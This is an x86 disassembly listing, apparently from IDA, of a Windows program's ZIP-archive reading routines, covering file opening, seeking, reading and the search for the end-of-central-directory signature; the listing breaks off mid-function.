var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_8], 1
jz short loc_42E451
cmp [ebp+arg_8], 2
jz short loc_42E451
cmp [ebp+arg_8], 3
jz short loc_42E451
mov eax, [ebp+arg_C]
mov dword ptr [eax], 10000h
xor eax, eax
jmp loc_42E5B7
; ---------------------------------------------------------------------------
loc_42E451: ; CODE XREF: sub_42E429+A�j
; sub_42E429+10�j ...
mov [ebp+var_8], 0
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 0
cmp [ebp+arg_8], 1
jz short loc_42E475
cmp [ebp+arg_8], 2
jnz loc_42E50C
loc_42E475: ; CODE XREF: sub_42E429+40�j
cmp [ebp+arg_8], 1
jnz short loc_42E4BE
mov edx, [ebp+arg_0]
mov [ebp+var_18], edx
push 2
push 0
push 0
lea eax, [ebp+var_8]
push eax
call dword_43309C ; GetCurrentProcess
push eax
mov ecx, [ebp+var_18]
push ecx
call dword_43309C ; GetCurrentProcess
push eax
call dword_4330A0 ; DuplicateHandle
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_42E4BC
mov edx, [ebp+arg_C]
mov dword ptr [edx], 100h
xor eax, eax
jmp loc_42E5B7
; ---------------------------------------------------------------------------
loc_42E4BC: ; CODE XREF: sub_42E429+81�j
jmp short loc_42E4F3
; ---------------------------------------------------------------------------
loc_42E4BE: ; CODE XREF: sub_42E429+50�j
push 0
push 80h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call dword_433018 ; CreateFileA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_42E4F3
mov ecx, [ebp+arg_C]
mov dword ptr [ecx], 200h
xor eax, eax
jmp loc_42E5B7
; ---------------------------------------------------------------------------
loc_42E4F3: ; CODE XREF: sub_42E429:loc_42E4BC�j
; sub_42E429+B8�j
mov edx, [ebp+var_8]
push edx
call dword_4330A4 ; GetFileType
mov [ebp+var_10], eax
xor eax, eax
cmp [ebp+var_10], 1
setz al
mov byte ptr [ebp+var_4], al
loc_42E50C: ; CODE XREF: sub_42E429+46�j
push 1Ch
call sub_431624
add esp, 4
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
mov [ebp+var_C], ecx
cmp [ebp+arg_8], 1
jz short loc_42E52B
cmp [ebp+arg_8], 2
jnz short loc_42E578
loc_42E52B: ; CODE XREF: sub_42E429+FA�j
mov edx, [ebp+var_C]
mov byte ptr [edx], 1
mov eax, [ebp+var_C]
mov cl, byte ptr [ebp+var_4]
mov [eax+1], cl
mov edx, [ebp+var_C]
mov eax, [ebp+var_8]
mov [edx+4], eax
mov ecx, [ebp+var_C]
mov byte ptr [ecx+8], 0
mov edx, [ebp+var_C]
mov dword ptr [edx+0Ch], 0
mov eax, [ebp+var_4]
and eax, 0FFh
test eax, eax
jz short loc_42E576
push 1
push 0
push 0
mov ecx, [ebp+var_8]
push ecx
call dword_4330A8 ; SetFilePointer
mov edx, [ebp+var_C]
mov [edx+0Ch], eax
loc_42E576: ; CODE XREF: sub_42E429+135�j
jmp short loc_42E5AB
; ---------------------------------------------------------------------------
loc_42E578: ; CODE XREF: sub_42E429+100�j
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
mov ecx, [ebp+var_C]
mov byte ptr [ecx+1], 1
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
mov [edx+10h], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [ecx+14h], edx
mov eax, [ebp+var_C]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+var_C]
mov dword ptr [ecx+0Ch], 0
loc_42E5AB: ; CODE XREF: sub_42E429:loc_42E576�j
mov edx, [ebp+arg_C]
mov dword ptr [edx], 0
mov eax, [ebp+var_C]
loc_42E5B7: ; CODE XREF: sub_42E429+23�j
; sub_42E429+8E�j ...
mov esp, ebp
pop ebp
retn
sub_42E429 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E5BB proc near ; CODE XREF: sub_42EBC2+28�p
; sub_42EBC2+19D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_42E5CA
or eax, 0FFFFFFFFh
jmp short loc_42E5F6
; ---------------------------------------------------------------------------
loc_42E5CA: ; CODE XREF: sub_42E5BB+8�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42E5E2
mov edx, [ebp+arg_0]
mov eax, [edx+4]
push eax
call dword_433020 ; CloseHandle
loc_42E5E2: ; CODE XREF: sub_42E5BB+18�j
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_43161E
add esp, 4
xor eax, eax
loc_42E5F6: ; CODE XREF: sub_42E5BB+D�j
mov esp, ebp
pop ebp
retn
sub_42E5BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E5FA proc near ; CODE XREF: sub_42E7EE+39�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42E61B
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+8]
test eax, eax
jz short loc_42E61B
mov eax, 1
jmp short loc_42E61D
; ---------------------------------------------------------------------------
loc_42E61B: ; CODE XREF: sub_42E5FA+C�j
; sub_42E5FA+18�j
xor eax, eax
loc_42E61D: ; CODE XREF: sub_42E5FA+1F�j
pop ebp
retn
sub_42E5FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E61F proc near ; CODE XREF: sub_42EA31+25�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42E654
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_42E654
push 1
push 0
push 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
push edx
call dword_4330A8 ; SetFilePointer
mov ecx, [ebp+arg_0]
sub eax, [ecx+0Ch]
jmp short loc_42E669
; ---------------------------------------------------------------------------
loc_42E654: ; CODE XREF: sub_42E61F+C�j
; sub_42E61F+18�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_42E663
xor eax, eax
jmp short loc_42E669
; ---------------------------------------------------------------------------
loc_42E663: ; CODE XREF: sub_42E61F+3E�j
mov ecx, [ebp+arg_0]
mov eax, [ecx+18h]
loc_42E669: ; CODE XREF: sub_42E61F+33�j
; sub_42E61F+42�j
pop ebp
retn
sub_42E61F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E66B proc near ; CODE XREF: sub_42EA31+E�p
; sub_42EA31+D7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42E6ED
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_42E6ED
cmp [ebp+arg_8], 0
jnz short loc_42E6A8
push 0
push 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
add edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4330A8 ; SetFilePointer
jmp short loc_42E6E9
; ---------------------------------------------------------------------------
loc_42E6A8: ; CODE XREF: sub_42E66B+1E�j
cmp [ebp+arg_8], 1
jnz short loc_42E6C5
push 1
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4330A8 ; SetFilePointer
jmp short loc_42E6E9
; ---------------------------------------------------------------------------
loc_42E6C5: ; CODE XREF: sub_42E66B+41�j
cmp [ebp+arg_8], 2
jnz short loc_42E6E2
push 2
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call dword_4330A8 ; SetFilePointer
jmp short loc_42E6E9
; ---------------------------------------------------------------------------
loc_42E6E2: ; CODE XREF: sub_42E66B+5E�j
mov eax, 13h
jmp short loc_42E73E
; ---------------------------------------------------------------------------
loc_42E6E9: ; CODE XREF: sub_42E66B+3B�j
; sub_42E66B+58�j ...
xor eax, eax
jmp short loc_42E73E
; ---------------------------------------------------------------------------
loc_42E6ED: ; CODE XREF: sub_42E66B+C�j
; sub_42E66B+18�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_42E6FF
mov eax, 1Dh
jmp short loc_42E73E
; ---------------------------------------------------------------------------
loc_42E6FF: ; CODE XREF: sub_42E66B+8B�j
cmp [ebp+arg_8], 0
jnz short loc_42E710
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov [ecx+18h], edx
jmp short loc_42E73C
; ---------------------------------------------------------------------------
loc_42E710: ; CODE XREF: sub_42E66B+98�j
cmp [ebp+arg_8], 1
jnz short loc_42E727
mov eax, [ebp+arg_0]
mov ecx, [eax+18h]
add ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
jmp short loc_42E73C
; ---------------------------------------------------------------------------
loc_42E727: ; CODE XREF: sub_42E66B+A9�j
cmp [ebp+arg_8], 2
jnz short loc_42E73C
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
add ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [edx+18h], ecx
loc_42E73C: ; CODE XREF: sub_42E66B+A3�j
; sub_42E66B+BA�j ...
xor eax, eax
loc_42E73E: ; CODE XREF: sub_42E66B+7C�j
; sub_42E66B+80�j ...
pop ebp
retn
sub_42E66B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E740 proc near ; CODE XREF: sub_42E7EE+12�p
; sub_42EA31+F6�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_C]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_42E790
push 0
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
push ecx
call dword_43301C ; ReadFile
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42E786
mov edx, [ebp+arg_C]
mov byte ptr [edx+8], 1
loc_42E786: ; CODE XREF: sub_42E740+3D�j
mov eax, [ebp+var_10]
xor edx, edx
div [ebp+arg_4]
jmp short loc_42E7EA
; ---------------------------------------------------------------------------
loc_42E790: ; CODE XREF: sub_42E740+19�j
mov eax, [ebp+arg_C]
mov ecx, [eax+18h]
add ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
cmp ecx, [edx+14h]
jbe short loc_42E7B0
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_C]
mov edx, [eax+14h]
sub edx, [ecx+18h]
mov [ebp+var_8], edx
loc_42E7B0: ; CODE XREF: sub_42E740+5F�j
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_C]
mov edx, [ecx+10h]
mov eax, [ebp+arg_C]
add edx, [eax+18h]
push edx
mov ecx, [ebp+arg_0]
push ecx
call sub_431764 ; memcpy
add esp, 0Ch
mov edx, [ebp+var_8]
mov [ebp+var_4], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+18h]
add ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [edx+18h], ecx
mov eax, [ebp+var_4]
xor edx, edx
div [ebp+arg_4]
loc_42E7EA: ; CODE XREF: sub_42E740+4E�j
mov esp, ebp
pop ebp
retn
sub_42E740 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E7EE proc near ; CODE XREF: sub_42E83E+E�p
; sub_42E83E+2D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
push eax
push 1
push 1
lea ecx, [ebp+var_8]
push ecx
call sub_42E740
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jnz short loc_42E823
mov edx, [ebp+var_8]
and edx, 0FFh
mov eax, [ebp+arg_4]
mov [eax], edx
xor eax, eax
jmp short loc_42E83A
; ---------------------------------------------------------------------------
loc_42E823: ; CODE XREF: sub_42E7EE+21�j
mov ecx, [ebp+arg_0]
push ecx
call sub_42E5FA
add esp, 4
test eax, eax
jz short loc_42E838
or eax, 0FFFFFFFFh
jmp short loc_42E83A
; ---------------------------------------------------------------------------
loc_42E838: ; CODE XREF: sub_42E7EE+43�j
xor eax, eax
loc_42E83A: ; CODE XREF: sub_42E7EE+33�j
; sub_42E7EE+48�j
mov esp, ebp
pop ebp
retn
sub_42E7EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E83E proc near ; CODE XREF: sub_42EBC2+9A�p
; sub_42EBC2+B5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_42E876
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
loc_42E876: ; CODE XREF: sub_42E83E+23�j
mov edx, [ebp+var_C]
shl edx, 8
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jnz short loc_42E894
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx], edx
jmp short loc_42E89D
; ---------------------------------------------------------------------------
loc_42E894: ; CODE XREF: sub_42E83E+4A�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
loc_42E89D: ; CODE XREF: sub_42E83E+54�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42E83E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E8A4 proc near ; CODE XREF: sub_42EBC2+7F�p
; sub_42EBC2+127�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_42E8DC
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
loc_42E8DC: ; CODE XREF: sub_42E8A4+23�j
mov edx, [ebp+var_C]
shl edx, 8
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
cmp [ebp+var_4], 0
jnz short loc_42E903
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
loc_42E903: ; CODE XREF: sub_42E8A4+4A�j
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_8], ecx
cmp [ebp+var_4], 0
jnz short loc_42E92A
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E7EE
add esp, 8
mov [ebp+var_4], eax
loc_42E92A: ; CODE XREF: sub_42E8A4+71�j
mov ecx, [ebp+var_C]
shl ecx, 18h
mov edx, [ebp+var_8]
add edx, ecx
mov [ebp+var_8], edx
cmp [ebp+var_4], 0
jnz short loc_42E948
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_42E951
; ---------------------------------------------------------------------------
loc_42E948: ; CODE XREF: sub_42E8A4+98�j
mov edx, [ebp+arg_4]
mov dword ptr [edx], 0
loc_42E951: ; CODE XREF: sub_42E8A4+A2�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42E8A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E958 proc near ; CODE XREF: sub_42EA04+23�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
loc_42E95E: ; CODE XREF: sub_42E958:loc_42E9FB�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_4], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
mov cl, [eax]
mov [ebp+var_8], cl
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
movsx eax, [ebp+var_4]
cmp eax, 61h
jl short loc_42E99B
movsx ecx, [ebp+var_4]
cmp ecx, 7Ah
jg short loc_42E99B
mov dl, [ebp+var_4]
sub dl, 20h
mov [ebp+var_4], dl
loc_42E99B: ; CODE XREF: sub_42E958+2F�j
; sub_42E958+38�j
movsx eax, [ebp+var_8]
cmp eax, 61h
jl short loc_42E9B6
movsx ecx, [ebp+var_8]
cmp ecx, 7Ah
jg short loc_42E9B6
mov dl, [ebp+var_8]
sub dl, 20h
mov [ebp+var_8], dl
loc_42E9B6: ; CODE XREF: sub_42E958+4A�j
; sub_42E958+53�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_42E9C8
movsx eax, [ebp+var_8]
neg eax
sbb eax, eax
jmp short loc_42EA00
; ---------------------------------------------------------------------------
loc_42E9C8: ; CODE XREF: sub_42E958+64�j
movsx ecx, [ebp+var_8]
test ecx, ecx
jnz short loc_42E9D7
mov eax, 1
jmp short loc_42EA00
; ---------------------------------------------------------------------------
loc_42E9D7: ; CODE XREF: sub_42E958+76�j
movsx edx, [ebp+var_4]
movsx eax, [ebp+var_8]
cmp edx, eax
jge short loc_42E9E8
or eax, 0FFFFFFFFh
jmp short loc_42EA00
; ---------------------------------------------------------------------------
loc_42E9E8: ; CODE XREF: sub_42E958+89�j
movsx ecx, [ebp+var_4]
movsx edx, [ebp+var_8]
cmp ecx, edx
jle short loc_42E9FB
mov eax, 1
jmp short loc_42EA00
; ---------------------------------------------------------------------------
loc_42E9FB: ; CODE XREF: sub_42E958+9A�j
jmp loc_42E95E
; ---------------------------------------------------------------------------
loc_42EA00: ; CODE XREF: sub_42E958+6E�j
; sub_42E958+7D�j ...
mov esp, ebp
pop ebp
retn
sub_42E958 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EA04 proc near ; CODE XREF: sub_42F43A+D5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 1
jnz short loc_42EA1F
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4317B4 ; strcmp
add esp, 8
jmp short loc_42EA2F
; ---------------------------------------------------------------------------
loc_42EA1F: ; CODE XREF: sub_42EA04+7�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E958
add esp, 8
loc_42EA2F: ; CODE XREF: sub_42EA04+19�j
pop ebp
retn
sub_42EA04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EA31 proc near ; CODE XREF: sub_42EBC2+42�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push 2
push 0
mov eax, [ebp+arg_0]
push eax
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42EA52
xor eax, eax
jmp loc_42EBBE
; ---------------------------------------------------------------------------
loc_42EA52: ; CODE XREF: sub_42EA31+18�j
mov ecx, [ebp+arg_0]
push ecx
call sub_42E61F
add esp, 4
mov [ebp+var_8], eax
mov [ebp+var_14], 0FFFFh
mov edx, [ebp+var_14]
cmp edx, [ebp+var_8]
jbe short loc_42EA76
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
loc_42EA76: ; CODE XREF: sub_42EA31+3D�j
push 404h
call dword_4331C8 ; malloc
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42EA94
xor eax, eax
jmp loc_42EBBE
; ---------------------------------------------------------------------------
loc_42EA94: ; CODE XREF: sub_42EA31+5A�j
mov [ebp+var_10], 0
mov [ebp+var_C], 4
loc_42EAA2: ; CODE XREF: sub_42EA31:loc_42EBA3�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_14]
jnb loc_42EBA8
mov edx, [ebp+var_C]
add edx, 400h
cmp edx, [ebp+var_14]
jbe short loc_42EAC4
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
jmp short loc_42EAD0
; ---------------------------------------------------------------------------
loc_42EAC4: ; CODE XREF: sub_42EA31+89�j
mov ecx, [ebp+var_C]
add ecx, 400h
mov [ebp+var_C], ecx
loc_42EAD0: ; CODE XREF: sub_42EA31+91�j
mov edx, [ebp+var_8]
sub edx, [ebp+var_C]
mov [ebp+var_20], edx
mov eax, [ebp+var_8]
sub eax, [ebp+var_20]
cmp eax, 404h
jbe short loc_42EAEF
mov [ebp+var_24], 404h
jmp short loc_42EAF8
; ---------------------------------------------------------------------------
loc_42EAEF: ; CODE XREF: sub_42EA31+B3�j
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
loc_42EAF8: ; CODE XREF: sub_42EA31+BC�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
push 0
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42EB19
jmp loc_42EBA8
; ---------------------------------------------------------------------------
loc_42EB19: ; CODE XREF: sub_42EA31+E1�j
mov edx, [ebp+arg_0]
push edx
push 1
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42EB36
jmp short loc_42EBA8
; ---------------------------------------------------------------------------
loc_42EB36: ; CODE XREF: sub_42EA31+101�j
mov edx, [ebp+var_18]
sub edx, 3
mov [ebp+var_1C], edx
loc_42EB3F: ; CODE XREF: sub_42EA31:loc_42EB99�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jle short loc_42EB9B
mov edx, [ebp+var_4]
add edx, [ebp+var_1C]
xor eax, eax
mov al, [edx]
cmp eax, 50h
jnz short loc_42EB99
mov ecx, [ebp+var_4]
add ecx, [ebp+var_1C]
xor edx, edx
mov dl, [ecx+1]
cmp edx, 4Bh
jnz short loc_42EB99
mov eax, [ebp+var_4]
add eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+2]
cmp ecx, 5
jnz short loc_42EB99
mov edx, [ebp+var_4]
add edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+3]
cmp eax, 6
jnz short loc_42EB99
mov ecx, [ebp+var_20]
add ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
jmp short loc_42EB9B
; ---------------------------------------------------------------------------
loc_42EB99: ; CODE XREF: sub_42EA31+12B�j
; sub_42EA31+13B�j ...
jmp short loc_42EB3F
; ---------------------------------------------------------------------------
loc_42EB9B: ; CODE XREF: sub_42EA31+11C�j
; sub_42EA31+166�j
cmp [ebp+var_10], 0
jz short loc_42EBA3
jmp short loc_42EBA8
; ---------------------------------------------------------------------------
loc_42EBA3: ; CODE XREF: sub_42EA31+16E�j
jmp loc_42EAA2
; ---------------------------------------------------------------------------
loc_42EBA8: ; CODE XREF: sub_42EA31+77�j
; sub_42EA31+E3�j ...
cmp [ebp+var_4], 0
jz short loc_42EBBB
mov edx, [ebp+var_4]
push edx
call dword_4331D4 ; free
add esp, 4
loc_42EBBB: ; CODE XREF: sub_42EA31+17B�j
mov eax, [ebp+var_10]
loc_42EBBE: ; CODE XREF: sub_42EA31+1C�j
; sub_42EA31+5E�j
mov esp, ebp
pop ebp
retn
sub_42EA31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EBC2 proc near ; CODE XREF: sub_42FFCE+99�p
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_90 = dword ptr -90h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 9Ch
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_42EBDA
xor eax, eax
jmp loc_42EDD2
; ---------------------------------------------------------------------------
loc_42EBDA: ; CODE XREF: sub_42EBC2+F�j
movsx eax, byte_434AB4
cmp eax, 20h
jz short loc_42EBF9
mov ecx, [ebp+arg_0]
push ecx
call sub_42E5BB
add esp, 4
xor eax, eax
jmp loc_42EDD2
; ---------------------------------------------------------------------------
loc_42EBF9: ; CODE XREF: sub_42EBC2+22�j
mov [ebp+var_8], 0
mov edx, [ebp+arg_0]
push edx
call sub_42EA31
add esp, 4
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_42EC1C
mov [ebp+var_8], 0FFFFFFFFh
loc_42EC1C: ; CODE XREF: sub_42EBC2+51�j
push 0
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42EC39
mov [ebp+var_8], 0FFFFFFFFh
loc_42EC39: ; CODE XREF: sub_42EBC2+6E�j
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42EC54
mov [ebp+var_8], 0FFFFFFFFh
loc_42EC54: ; CODE XREF: sub_42EBC2+89�j
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EC6F
mov [ebp+var_8], 0FFFFFFFFh
loc_42EC6F: ; CODE XREF: sub_42EBC2+A4�j
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EC8A
mov [ebp+var_8], 0FFFFFFFFh
loc_42EC8A: ; CODE XREF: sub_42EBC2+BF�j
lea edx, [ebp+var_98]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42ECA8
mov [ebp+var_8], 0FFFFFFFFh
loc_42ECA8: ; CODE XREF: sub_42EBC2+DD�j
lea ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42ECC3
mov [ebp+var_8], 0FFFFFFFFh
loc_42ECC3: ; CODE XREF: sub_42EBC2+F8�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_98]
jnz short loc_42ECDA
cmp [ebp+var_18], 0
jnz short loc_42ECDA
cmp [ebp+var_4], 0
jz short loc_42ECE1
loc_42ECDA: ; CODE XREF: sub_42EBC2+10A�j
; sub_42EBC2+110�j
mov [ebp+var_8], 0FFFFFF99h
loc_42ECE1: ; CODE XREF: sub_42EBC2+116�j
lea ecx, [ebp+var_7C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42ECFC
mov [ebp+var_8], 0FFFFFFFFh
loc_42ECFC: ; CODE XREF: sub_42EBC2+131�j
lea eax, [ebp+var_78]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42ED17
mov [ebp+var_8], 0FFFFFFFFh
loc_42ED17: ; CODE XREF: sub_42EBC2+14C�j
lea edx, [ebp+var_94]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42ED35
mov [ebp+var_8], 0FFFFFFFFh
loc_42ED35: ; CODE XREF: sub_42EBC2+16A�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
add edx, [ecx+0Ch]
mov eax, [ebp+var_78]
add eax, [ebp+var_7C]
cmp edx, eax
jnb short loc_42ED55
cmp [ebp+var_8], 0
jnz short loc_42ED55
mov [ebp+var_8], 0FFFFFF99h
